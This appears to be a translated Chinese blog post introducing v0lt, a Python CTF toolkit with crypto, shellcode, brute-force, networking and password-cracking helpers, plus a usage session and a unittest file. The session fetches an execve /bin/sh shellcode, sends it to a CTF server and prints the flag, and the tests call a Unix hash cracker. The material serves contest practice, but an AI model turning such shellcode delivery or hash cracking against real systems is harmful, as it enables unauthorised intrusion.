v0lt CTF安全工具包
0×00 v0lt
v0lt是一个我尝试重组每一个我使用过的/现在在使用的/将来要用的用python开发的安全领域CTF工具。实践任务可能会采用bash脚本来解决,但我认为Python更具有灵活性,这也是我做出这一选择的原因。和丹麦CTF队伍Gallopsled开发的pwntools 没有关系,v0lt只是一个小型灵活但是却具有一些特别功能的工具包。
0×01 要求和安装
依赖关系:
- Libmagic
- Python3
- BeautifulSoup
- Requests
- filemagic
- hexdump
- passlib
安装:
1
2
3
|
git clone https: //github .com /P1kachu/v0lt .git cd v0lt [ sudo ] python3 setup.py install # 要求sudo执行是因为可能存在缺失的依赖关系 |
实例: Shellcodes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
>>> from v0lt import * >>> nc = Netcat( "archpichu.ddns.net" , 65102 ) Connected to port 65102 >>> print (nc.read()) GIVE ME SHELLCODZ >>> shellhack = ShellHack( 4096 , "bin" , "execve" ) >>> shellhack.get_shellcodes(shellhack.keywords) ...<SNIPPED>... 85 : Linux / x86:setuid( 0 ) & execve( / sbin / poweroff - f) - 47 bytes 86 : Linux / x86:execve ( / bin / sh) - 21 Bytes 87 : Linux / x86: break chroot execve / bin / sh - 80 bytes 88 : Linux / x86:execve( / bin / sh, 0 , 0 ) - 21 bytes ...<SNIPPED>... Selection: 86 Your choice: http: / / shell - storm.org / shellcode / files / shellcode - 752.php Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]" >>> nc.shellcat(shellhack.shellcode) >>> nc.writeln(shellhack.pad()) >>> exploit = nc.dialogue( "cat flag" , 3 ) >>> print (exploit) AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File name too long P1kaCTF{sh3llc0de_1s_e4zY} |
实现功能:
加密
- Base64
- 凯撒移位
- 哈希功能(SHA, MD5)
- 位运算(XOR, 反向XOR)
- 常用转换(bytes, strings, hex)
- RSA基础模块 (逆模, 逆幂, 实现RSA共模攻击的egcd脚本…)
- 暴力破解(基于字典, 自定义词)
Shellcodes
- 从Jonathan Salwan的个人网站Shell-storm选定Shellcode并用repo工具下载
- Shellcode格式
- Shell{cat,net}: 轻松发送Shellcode
- 自动填充
连接支持
- Netcat
- Telnet
更多可获得的实例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
|
import unittest from v0lt import * __author__ = 'P1kachu' class Tests(unittest.TestCase): def test_netcat( self ): nc = Netcat( "archpichu.ddns.net" , 65103 ) self .assertEqual(nc.read(), "\nNothing to display yet...\n" ) def test_telnet( self ): tl = Telnet( "archpichu.ddns.net" , 65103 ) self .assertEqual(tl.read(), "\nNothing to display yet...\n" ) def test_stack( self ): stack = Stack() self .assertEqual(stack.size(), 0 ) stack.push( "item" ) self .assertEqual(stack.is_empty(), False ) self .assertEqual(stack.size(), 1 ) item = stack.pop() self .assertEqual(stack.size(), 0 ) self .assertEqual(item, "item" ) self .assertEqual(stack.is_empty(), True ) def test_basic_ceasar( self ): plaintext = "This is a ceasar plaintext" encrypted = "GUVF VF N PRNFNE CYNVAGRKG" deciphered = basic_ceasar(plaintext, offset = 13 ) self .assertEqual(encrypted, deciphered) def test_get_shellcode( self ): sh = ShellHack( 70 , "/bin/lol" ) sh.get_shellcodes(sh.keywords) sh = ShellHack( 70 , "/bin/sh" ) sh.get_shellcodes(sh.keywords) def test_flag_gen( self ): flags_gen( "flags.tmp" , "P1ka" , 10 ) def test_find_nth( self ): self .assertEqual(find_nth( "lolilol" , "l" , 3 ), 6 ) self .assertEqual(find_nth( "lolilol" , "l" , 4 ), - 1 ) def brute( self ): bf = Bruteforce(charset = "abcd" , final_length = 5 , begin_with = "l" , end_with = "P" ) bf.generate_strings() bf = Bruteforce(charset = "abcdef" , final_length = 12 , begin_with = "l" , end_with = "P" ) bf.generate_strings(output = "bf.tmp" ) def test_hex( self ): he = Hexeditor() he.dump_file( "setup.py" ) he.save_file_as_hex( "save.tmp" ) he.restore_file( "test1.tmp" ) he.restore_file( "test2.tmp" , "save.tmp" ) def test_passwd_cracker( self ): nix_basic_pass_cracker( "HX9LLTdc/jiDE" ) nix_basic_pass_cracker( "HX8LLTdc/jiDE" ) # nix_basic_pass_cracker("$1$khkWa1Nz$7YcmdOO1/uyHhMB7ga2L.1") # nix_basic_pass_cracker("$5$khkWa1Nz$583CsGZkoT82wh2ukf75KT4VVrf9ZO/P0FXLiPKgG//") # nix_basic_pass_cracker("$6$P1$XKg/SKZpe8Gbl5Utt3XVJEA4zJ6KB.IuZlShnP2FljfF32z3zoytnB.MaP9dJOObSOtiidHmeBp.feOqK4Mvg/") if __name__ = = "__main__" : suite = unittest.defaultTestLoader.loadTestsFromTestCase(Tests) unittest.TextTestRunner().run(suite) |
0×02 变更记录
只包括主要功能和变化。错误修正和次要的变化略。
1.3 版本
- 再次做了许多修复
- Hexeditor (转储/重写文件)
- Unix密码暴力破解
1.2 版本
- 修改/修复/修正了许多文档/bugs/框架
- 增加了暴力破解模块
- 增加了linux下一些实用工具
- 增加了Hexeditor
- Shellhack修复
- 增加了警报信息
1.0 版本
- 修改了许多文档
- 修复了许多bugs
- 增加了shellhack (shellcodes参照工具)
- 增加了加密工具
- 增加了网络方面工具
- 固定了项目树
译者注:
项目作者:P1kachu
项目主页:https://github.com/P1kachu/v0lt
转载请注明来自4ido10n's Blog文章《v0lt CTF安全工具包》